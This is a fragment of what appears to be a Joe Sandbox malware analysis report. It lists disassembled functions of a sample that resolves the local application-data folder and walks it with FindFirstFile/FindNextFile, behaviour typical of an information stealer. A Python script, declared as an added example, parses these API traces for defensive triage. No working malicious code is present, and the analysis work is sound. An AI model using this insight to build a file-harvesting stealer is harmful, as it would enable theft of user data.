                                  • __updatetlocinfoEx_nolock.LIBCMT ref: 006CCAC7
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1763025925.00000000006B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                                  • String ID:
                                  • API String ID: 300741435-0
                                  • Opcode ID: 96c6376f016876d78b941607826060b4a9a774ab165e4bcb55ea45fbc112bf51
                                  • Instruction ID: 177372d8585ef9d12f03ba57c09b248d2b54d05692f63107ea5733e200df9ad9
                                  • Opcode Fuzzy Hash: 96c6376f016876d78b941607826060b4a9a774ab165e4bcb55ea45fbc112bf51
                                  • Instruction Fuzzy Hash: BAF096319442199BD7A0FBE8580BF7E73A3EF40730F11114EF40D962D2CB2459418B9D
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1763025925.00000000006DC000.00000040.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true
• Associated: 00000000.00000002.1763010966.00000000006B0000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1763025925.00000000006B1000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1763025925.00000000007ED000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1763025925.00000000007F9000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1763025925.000000000081E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1763025925.0000000000986000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1763194272.000000000099A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1763194272.0000000000B1C000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1763194272.0000000000BFA000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1763194272.0000000000C1F000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1763194272.0000000000C29000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1763194272.0000000000C37000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1763405485.0000000000C38000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1763495987.0000000000DD2000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1763551714.0000000000DD3000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Catch
                                  • String ID: MOC$RCC
                                  • API String ID: 78271584-2084237596
                                  • Opcode ID: 0af11e6eed5334c4ff19d0facd52f0310ea7249913ed55efd4c21f0934d53438
                                  • Instruction ID: 9fa63f8cd776fd04144f791d26d7f99e27613b2d2a4a9d69ddce38f86eb09871
                                  • Opcode Fuzzy Hash: 0af11e6eed5334c4ff19d0facd52f0310ea7249913ed55efd4c21f0934d53438
                                  • Instruction Fuzzy Hash: 8B414971900209EFEF15DF98DC91EEEBBB5BF48304F188199F904A6212D3399960DF91
                                  APIs
                                    • Part of subcall function 006C8F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 006C8F9B
                                  • lstrcat.KERNEL32(?,00000000), ref: 006C51CA
                                  • lstrcat.KERNEL32(?,006D1058), ref: 006C51E7
                                  • lstrcat.KERNEL32(?,014790D8), ref: 006C51FB
                                  • lstrcat.KERNEL32(?,006D105C), ref: 006C520D
                                    • Part of subcall function 006C4B60: wsprintfA.USER32 ref: 006C4B7C
                                    • Part of subcall function 006C4B60: FindFirstFileA.KERNEL32(?,?), ref: 006C4B93
                                    • Part of subcall function 006C4B60: StrCmpCA.SHLWAPI(?,006D0FC4), ref: 006C4BC1
                                    • Part of subcall function 006C4B60: StrCmpCA.SHLWAPI(?,006D0FC8), ref: 006C4BD7
                                    • Part of subcall function 006C4B60: FindNextFileA.KERNEL32(000000FF,?), ref: 006C4DCD
                                    • Part of subcall function 006C4B60: FindClose.KERNEL32(000000FF), ref: 006C4DE2
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1763025925.00000000006B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true
• Associated: 00000000.00000002.1763010966.00000000006B0000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1763025925.00000000006DC000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1763025925.00000000007ED000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1763025925.00000000007F9000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1763025925.000000000081E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1763025925.0000000000986000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1763194272.000000000099A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1763194272.0000000000B1C000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1763194272.0000000000BFA000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1763194272.0000000000C1F000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1763194272.0000000000C29000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1763194272.0000000000C37000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1763405485.0000000000C38000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1763495987.0000000000DD2000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1763551714.0000000000DD3000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                                  • String ID:
                                  • API String ID: 2667927680-0
                                  • Opcode ID: f5a512f930fc029f6f6f635e036057fa8df543fcdc23346cb10432a6154780bc
                                  • Instruction ID: 03b41b4ead9fec029f7486e48b314b46c1340fa0e4921e035223fea1a4c8bcfb
                                  • Opcode Fuzzy Hash: f5a512f930fc029f6f6f635e036057fa8df543fcdc23346cb10432a6154780bc
                                  • Instruction Fuzzy Hash: 4D212BB6904208BBD754F7B0EC52FFD733D9B44300F00454CB6569A281EE749AC88B95
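The API list of the function above (SHGetFolderPathA with CSIDL 0x1C, four lstrcat calls building a path, then a wsprintfA / FindFirstFileA / StrCmpCA / FindNextFileA / FindClose loop inside subcall 006C4B60) is the file-enumeration pattern a stealer uses to walk a profile folder. The script below is an added example, not part of the Joe Sandbox report and not code from the sample: it parses trace lines in the report's own format into structured calls, decodes the CSIDL argument of SHGetFolderPath, and flags any subcall that opens a FindFirstFile handle and iterates it with FindNextFile. The input lines are copied from the block above; the function names (parse_trace, shell_folders, find_enumeration_walks) are this example's own, and the CSIDL table is a partial one taken from the Windows SDK (shlobj.h). The string contents behind 006D0FC4 and 006D0FC8 are not shown on the page, so the example does not interpret them.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple

# Constructed input: the API trace lines of the function above, copied from the
# report with the bullet characters removed.
TRACE_LINES = [
    "Part of subcall function 006C8F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 006C8F9B",
    "lstrcat.KERNEL32(?,00000000), ref: 006C51CA",
    "lstrcat.KERNEL32(?,006D1058), ref: 006C51E7",
    "lstrcat.KERNEL32(?,014790D8), ref: 006C51FB",
    "lstrcat.KERNEL32(?,006D105C), ref: 006C520D",
    "Part of subcall function 006C4B60: wsprintfA.USER32 ref: 006C4B7C",
    "Part of subcall function 006C4B60: FindFirstFileA.KERNEL32(?,?), ref: 006C4B93",
    "Part of subcall function 006C4B60: StrCmpCA.SHLWAPI(?,006D0FC4), ref: 006C4BC1",
    "Part of subcall function 006C4B60: StrCmpCA.SHLWAPI(?,006D0FC8), ref: 006C4BD7",
    "Part of subcall function 006C4B60: FindNextFileA.KERNEL32(000000FF,?), ref: 006C4DCD",
    "Part of subcall function 006C4B60: FindClose.KERNEL32(000000FF), ref: 006C4DE2",
]


@dataclass
class ApiCall:
    api: str
    module: str
    args: List[Optional[int]]   # None where the sandbox printed "?" (argument not recovered)
    ref: int                    # address of the call site
    subcall: Optional[int]      # enclosing "Part of subcall function" address, if any


# "Part of subcall function XXXX: " prefix is optional; the argument list is optional
# (wsprintfA is listed without one); the comma before "ref:" is optional.
LINE_RE = re.compile(
    r"^(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+): )?"
    r"(?P<api>\w+)\.(?P<mod>\w+)"
    r"(?:\((?P<args>[^)]*)\))?"
    r",? ref: (?P<ref>[0-9A-Fa-f]+)$"
)


def parse_line(line: str) -> ApiCall:
    m = LINE_RE.match(line.strip().lstrip("•").strip())
    if not m:
        raise ValueError(f"unrecognised trace line: {line!r}")
    raw = m.group("args")
    args = [] if not raw else [None if a.strip() == "?" else int(a, 16) for a in raw.split(",")]
    sub = m.group("sub")
    return ApiCall(m.group("api"), m.group("mod"), args, int(m.group("ref"), 16),
                   int(sub, 16) if sub else None)


def parse_trace(lines: List[str]) -> List[ApiCall]:
    return [parse_line(l) for l in lines]


# Partial CSIDL table (Windows SDK shlobj.h); the low byte selects the folder,
# the high byte (CSIDL_FLAG_MASK 0xFF00) carries flags such as CSIDL_FLAG_CREATE.
CSIDL_NAMES = {
    0x05: "CSIDL_PERSONAL",
    0x10: "CSIDL_DESKTOPDIRECTORY",
    0x1A: "CSIDL_APPDATA",
    0x1C: "CSIDL_LOCAL_APPDATA",
    0x26: "CSIDL_PROGRAM_FILES",
    0x28: "CSIDL_PROFILE",
}


def shell_folders(calls: List[ApiCall]) -> List[Tuple[str, int, str]]:
    """Resolve the CSIDL (second argument) of every SHGetFolderPathA/W call."""
    out = []
    for c in calls:
        if c.api.startswith("SHGetFolderPath") and len(c.args) > 1 and c.args[1] is not None:
            csidl = c.args[1] & 0xFF
            out.append((c.api, csidl, CSIDL_NAMES.get(csidl, f"CSIDL_{csidl:#04x}")))
    return out


FIND_APIS = {"FindFirstFileA", "FindFirstFileW", "FindNextFileA", "FindNextFileW", "FindClose"}


def find_enumeration_walks(calls: List[ApiCall]) -> Dict[Optional[int], List[str]]:
    """Group Find* calls by enclosing subcall; keep groups that both open and iterate a search handle."""
    groups: Dict[Optional[int], List[str]] = {}
    for c in calls:
        if c.api in FIND_APIS:
            groups.setdefault(c.subcall, []).append(c.api)
    return {k: v for k, v in groups.items()
            if any(a.startswith("FindFirstFile") for a in v)
            and any(a.startswith("FindNextFile") for a in v)}


def count_api(calls: List[ApiCall], api: str) -> int:
    return sum(1 for c in calls if c.api == api)


def summarise(lines: List[str]) -> Dict[str, object]:
    calls = parse_trace(lines)
    return {
        "calls": len(calls),
        "folders": shell_folders(calls),          # which profile folder is resolved
        "path_concats": count_api(calls, "lstrcat"),  # how many pieces are appended to it
        "walks": find_enumeration_walks(calls),   # subcalls that enumerate a directory
    }


if __name__ == "__main__":
    for k, v in summarise(TRACE_LINES).items():
        print(f"{k}: {v}")
```

Run stand-alone it reports the single SHGetFolderPathA call resolving CSIDL_LOCAL_APPDATA, four lstrcat concatenations, and subcall 0x6C4B60 as a FindFirstFileA / FindNextFileA / FindClose walk. The same parser can be pointed at the other function blocks of the report to tabulate which folders the sample resolves and which functions enumerate them, which is the starting point for mapping the stealer's collection targets.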